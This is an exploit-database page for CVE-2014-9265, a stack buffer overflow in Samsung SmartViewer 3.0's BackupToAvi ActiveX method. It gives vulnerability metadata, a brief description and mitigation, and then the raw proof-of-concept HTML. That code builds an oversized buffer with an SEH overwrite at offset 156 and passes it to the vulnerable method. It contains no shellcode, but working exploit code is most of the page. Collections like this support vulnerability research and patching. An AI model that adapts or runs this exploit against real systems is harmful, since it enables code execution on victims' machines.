header-logo
Suggest Exploit
vendor:
SmartViewer
by:
Praveen Darshanam
9.3
CVSS
HIGH
Remote Code Execution
119
CWE
Product Name: SmartViewer
Affected Version From: 3
Affected Version To: 3
Patch Exists: YES
Related CWE: CVE-2014-9265
CPE: a:samsung:smartviewer:3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 Ultimate N SP1
2015

Samsung SmartViewer BackupToAvi Remote Code Execution PoC

This PoC exploits a vulnerability in Samsung SmartViewer 3.0, which allows remote code execution. The vulnerability is caused due to a boundary error in the BackupToAvi() method, which can be exploited to cause a stack-based buffer overflow by supplying a specially crafted argument. This can be exploited to execute arbitrary code by overwriting the SEH handler of the vulnerable application.

Mitigation:

Upgrade to the latest version of Samsung SmartViewer 3.0
Source

Exploit-DB raw data:

<html>
<!--
Samsung SmartViewer BackupToAvi Remote Code Execution PoC 
PoC developed by Praveen Darshanam 

For more details refer
http://darshanams.blogspot.com
http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
Original Vulnerability Discovered by rgod
Vulnerable: Samsung SmartViewer 3.0
Tested on Windows 7 Ultimate N SP1
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
-->

<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
<script >
 var payload_length = 15000;
 var arg1=1;
 var arg2=1;
 var arg3=1;
 //blank strings
 var junk = "";
 var buf1 = "";
 var buf2 = "";

 //offset to SE is 156, initial analysis using metasploit cyclic pattern
 for (i=0; i<156; i++)
 {
  buf1 += "A";
 }
 var nseh = "DD";
 var seh = "\x87\x10";	//from Vulnerable DLL
 junk = buf1 + nseh + seh;

 //remaining buffer
 for (j=0; j<(payload_length-junk.length); j++)
 {
  buf2 += "B";
 }
 //final malicious buffer
 var fbuff = junk + buf2;
 target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);

</script>
</html>

Navigation

Suggest Exploit

Services By CQR